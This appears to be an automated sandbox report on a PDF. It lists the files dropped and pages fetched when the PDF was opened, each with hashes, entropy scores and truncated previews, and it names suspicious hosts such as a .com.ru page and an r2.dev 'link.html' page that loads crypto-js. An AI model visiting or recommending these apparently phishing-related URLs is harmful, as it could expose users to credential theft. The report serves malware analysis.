                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ec69bc534fe0dc3dd83f35ce823b8bfc","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1720119936000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"420a088bca5da0f77f53d83cf6dc3acf","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1720119936000},{"id":"Edit_InApp_Aug2020","info":{"dg":"e6d0eb439061c59fbbb91236ccf4fd18","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1720119936000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"a636e7329769132c6a33a8ec47e295fd","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1720119936000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"172cf6845f56d0c966fc0370ee1d26f1","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1720119936000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"9c229cc8294a93ed849110b4cd231e9d","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1720119936000},
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                    Category:dropped
                                                    Size (bytes):12288
                                                    Entropy (8bit):1.189038231440262
                                                    Encrypted:false
                                                    SSDEEP:48:TGufl2GL7msEHUUUUUUUUwSvR9H9vxFGiDIAEkGVvpK:lNVmswUUUUUUUUw+FGSItu
                                                    MD5:A1255412B570086EBBDA2981ABA70352
                                                    SHA1:025393F96212E7D19548A789CA0A56BADC85DF47
                                                    SHA-256:C2376525B87ABF9F97A034D213A2BAC22C1709C5EC1A38CB7102C99601D84471
                                                    SHA-512:9B8195D6373C9F1C0538A49E5C9238D14F9F82B5ED6570419D538855E37BED48C9FBE65B604E88908DC967BF9DC2CE885469228A5B231C1DE501C1D4D738EC42
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):1.6083841797798892
                                                    Encrypted:false
                                                    SSDEEP:48:7MbKUUUUUUUUUUCvR9H9vxFGiDIAEkGVvvqFl2GL7msH:7tUUUUUUUUUUOFGSItdKVmsH
                                                    MD5:B78DD3EF2DE193263C078FA87083B73E
                                                    SHA1:E4FA42B24DA79E99DBE7D3E84A0011BDC60929C0
                                                    SHA-256:436DDC7E8A93FC35726E339CC3426DE788A39FFE8C6D571BCC30DB23465BA195
                                                    SHA-512:84344AA2DDA652E6C8AC95BACF16B8D2647FE94220EF8698BDDAC069CDB3CE6D74FFFC4D76742E74EFAC6E22D31AA5684A8C487A2D829F0FD9951B333F35BA70
                                                    Malicious:false
                                                    Preview:.... .c....../........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):3.536003181970279
                                                    Encrypted:false
                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K82/awwNWFf9:Qw946cPbiOxDlbYnuRK//GWn
                                                    MD5:41F99DC4D33475C0EAC87905511B250C
                                                    SHA1:339C96B62DF1AD5BEF52B2CE1D834225A67E6999
                                                    SHA-256:FAC44E4D4E4BEF3707379F705C80002D579A3D7AB4ED53A480ECC9360E4AC312
                                                    SHA-512:F2DF11501378C4A9D663C6B307E8FC0900B5731ABF01A5254209C006335AF5A6BB868B76014A5DFEA2945739389CBDB59DAF4B42DA6B6F87796693312F62CD68
                                                    Malicious:false
                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.4./.0.7./.2.0.2.4. . .1.5.:.0.5.:.3.8. .=.=.=.....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393)
                                                    Category:dropped
                                                    Size (bytes):16525
                                                    Entropy (8bit):5.345946398610936
                                                    Encrypted:false
                                                    SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                    MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                    SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                    SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                    SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                    Malicious:false
                                                    Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16603
                                                    Entropy (8bit):5.3289440874941825
                                                    Encrypted:false
                                                    SSDEEP:384:A0zoLtGrFO7JduAXxeee64XuqxAvSrnlszYkWC2g9J9qw6b9HeOTPiPSHHx9fRZ3:/cid
                                                    MD5:A8E9B85E3297259C81A6681D1960CDD8
                                                    SHA1:237DE44BF53F4100788C1CD29869D5066926B5A6
                                                    SHA-256:453EF4C2121D77984572DD92EFB21395D218EFB9933844A5259B8540A5F1C297
                                                    SHA-512:2ADF6E4710E98E83819A7119CA270F1693F02DB6BEEA909F08EC6D02294E1455AA090EF69A612F74A9F305460271CAAC3A5823ABAFD828121CEC5E617509CDD0
                                                    Malicious:false
                                                    Preview:SessionID=60f6dec2-3ec5-4f0b-a49c-6202c0f3b9e6.1720119933510 Timestamp=2024-07-04T15:05:33:510-0400 ThreadID=3492 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=60f6dec2-3ec5-4f0b-a49c-6202c0f3b9e6.1720119933510 Timestamp=2024-07-04T15:05:33:520-0400 ThreadID=3492 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=60f6dec2-3ec5-4f0b-a49c-6202c0f3b9e6.1720119933510 Timestamp=2024-07-04T15:05:33:521-0400 ThreadID=3492 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=60f6dec2-3ec5-4f0b-a49c-6202c0f3b9e6.1720119933510 Timestamp=2024-07-04T15:05:33:521-0400 ThreadID=3492 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=60f6dec2-3ec5-4f0b-a49c-6202c0f3b9e6.1720119933510 Timestamp=2024-07-04T15:05:33:521-0400 ThreadID=3492 Component=ngl-lib_NglAppLib Description="SetConf
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):29752
                                                    Entropy (8bit):5.385863549276047
                                                    Encrypted:false
                                                    SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rC:m
                                                    MD5:E30F3FB5024823D234B5951C21FFF6A2
                                                    SHA1:E28C6087BF116B70ECDBD67BB6566522F72B7171
                                                    SHA-256:583F404AF5EBC5CABA62A82B2226371664B6984D9BE5E57329CFF819B36D54BE
                                                    SHA-512:B8190FA54BEA09D2F22498F73EC9EFC98DD3D68D44F2B6F4056D3DDCDCB99AC388310303BFCF2508C340A9B82FF6B71A37929EE6963AE8834A5D10C877EF03C6
                                                    Malicious:false
                                                    Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                    Category:dropped
                                                    Size (bytes):386528
                                                    Entropy (8bit):7.9736851559892425
                                                    Encrypted:false
                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                    Malicious:false
                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                    Category:dropped
                                                    Size (bytes):1407294
                                                    Entropy (8bit):7.97605879016224
                                                    Encrypted:false
                                                    SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                    MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                    SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                    SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                    SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                    Malicious:false
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                    Category:dropped
                                                    Size (bytes):758601
                                                    Entropy (8bit):7.98639316555857
                                                    Encrypted:false
                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                    MD5:3A49135134665364308390AC398006F1
                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                    Malicious:false
                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                    Category:dropped
                                                    Size (bytes):1419751
                                                    Entropy (8bit):7.976496077007677
                                                    Encrypted:false
                                                    SSDEEP:24576:/xA7oYVWeGZpwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVYVWeGZpwZGk3mlind9i4ufFXpAXkru
                                                    MD5:595069628B1002AE06BE0D1B783F8CB2
                                                    SHA1:9F01BD78F5933E27DDA32EFE5B2076B733D42B8C
                                                    SHA-256:C4440EF843038A18C3862EB03468C060C932EFE9469EBB293D18714AB4CFEA53
                                                    SHA-512:5370969D2B115B6EB7536F3FE3ED1C8B493439E1ECA9E1158DEB9BFCFD4C2B6B92991792E44AB8874EF0CE8A83C657DE0F923C93B5B51F1B325A03BA1A1B97E3
                                                    Malicious:false
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (460), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):7161
                                                    Entropy (8bit):4.715343276503233
                                                    Encrypted:false
                                                    SSDEEP:96:+JiS2kTQ0NnlzxDTsXkC3KzHpkCn/aOPDR3HPQ4glt7DpDGcaajLX:yiSNQuzVsXkC6zHpTx/QBn7FDGcaajLX
                                                    MD5:240002E80E23F3F9650922BADC3D4531
                                                    SHA1:3CB73398EEA7BC5AF2DB6ABB50105C62892F7548
                                                    SHA-256:3340D7E30B68D45948031BC7022A630DB1DB2D400F95B4E5A1C9D1175FB3DED5
                                                    SHA-512:8D9D0992A1E6AE057C68DF656F1484502D30B5D74E065DD19FEBB2403E704EB45B546B354BFB5041C1C777A253F3321B4B40906F1191825B70B662301C59247D
                                                    Malicious:false
                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Tuner Car Community - menlologistics.com.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://www.experienceferrari.com/wp-content/uploads/2024/04/1968-Dodge-Charger-RT.jpg') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65447)
                                                    Category:downloaded
                                                    Size (bytes):65536
                                                    Entropy (8bit):5.291341878948596
                                                    Encrypted:false
                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdx:DIh8GgP3hujzwbhdx
                                                    MD5:6C4675CF3DF7F93BF4849E1D58E6C158
                                                    SHA1:657014EB75249D31008B213FCD81130B7176D496
                                                    SHA-256:9F567EC6BEA5A905D8A9F583B525A0E1866813F3B78B4B9F901F60F4EFB2378B
                                                    SHA-512:31F0BDF3D65F5E491D5CE538C207472290BED40E9B6D9B2721193CE9D5A3B550E6DB73A91CCA00A837E2B383B8133A8393EB1C0F5D1F3416628159DFD1C33D9F
                                                    Malicious:false
                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (47992), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):47992
                                                    Entropy (8bit):5.605846858683577
                                                    Encrypted:false
                                                    SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                    MD5:CF3402D7483B127DED4069D651EA4A22
                                                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                    Malicious:false
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (2824), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):5513
                                                    Entropy (8bit):5.743467387771568
                                                    Encrypted:false
                                                    SSDEEP:96:1hJMqfjk806gMKaHotgMk7d8o1+9FSXSkZa:f3fjk89Yy3+cST
                                                    MD5:A7ED94669C36345D5489425B9283985D
                                                    SHA1:0F9D46A0041B2D4BF394E4F8E50A060BC8E51EA7
                                                    SHA-256:2984DC0805B5E5B111F830971BDA65598AF27BF97AC32F0EBE21DFF31DFC573C
                                                    SHA-512:27193754FF22C1799FAE32853FAB324626BAC909AFD6A3CBB17A3776B4584C7B58107E6B8D075ADC7D2430C5DB306D4AA75BFC20DA8D4C4F3600D7E99C664C7F
                                                    Malicious:false
                                                    URL:https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html
                                                    Preview:<html>.. <head>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#visor {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#sagacity {width: 130px;margin-top: 179px;}#sweet {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#sweet>.warmth {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#sweet>.radish {width: 287px;height: 71px;background: #1388d6;transform: translate(-120px, 63px) rotate(-28deg);}#h
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (611)
                                                    Category:downloaded
                                                    Size (bytes):27150
                                                    Entropy (8bit):4.357340680151037
                                                    Encrypted:false
                                                    SSDEEP:384:6bamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:603Mp5If8WOmgW3
                                                    MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                                                    SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                                                    SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                                                    SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                                                    Malicious:false
                                                    URL:https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/favicon.ico
                                                    Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                                                    File type:PDF document, version 1.7, 1 pages
                                                    Entropy (8bit):7.9608447440069146
                                                    TrID:
                                                    • Adobe Portable Document Format (5005/1) 100.00%
                                                    File name:xJwSq336bs.pdf
                                                    File size:79'849 bytes
                                                    MD5:3c860412604778442a97627e84abc63b
                                                    SHA1:53cf6e9968a5234c923f2826d5e9fa97c880c3fd
                                                    SHA256:bb6e4fa5ab06f4c632734a62f0009901a4b6b32b4c71de65aa644c19c5e729ca
                                                    SHA512:39fe1bf8af595babb7a228c13ce9d7991f3a201611a76cbe761770c9b84eb5e9c1a089c2f0fcdcd40008f478def26865153b704e1a68d1ed804059b008b56e62
                                                    SSDEEP:1536:V9Vjwuv6NNOYSOsDTJfyW19dDAhDCqdjeCzV3Ll5BvCAY5n:flSRzsr195adjeGLlX5Yx
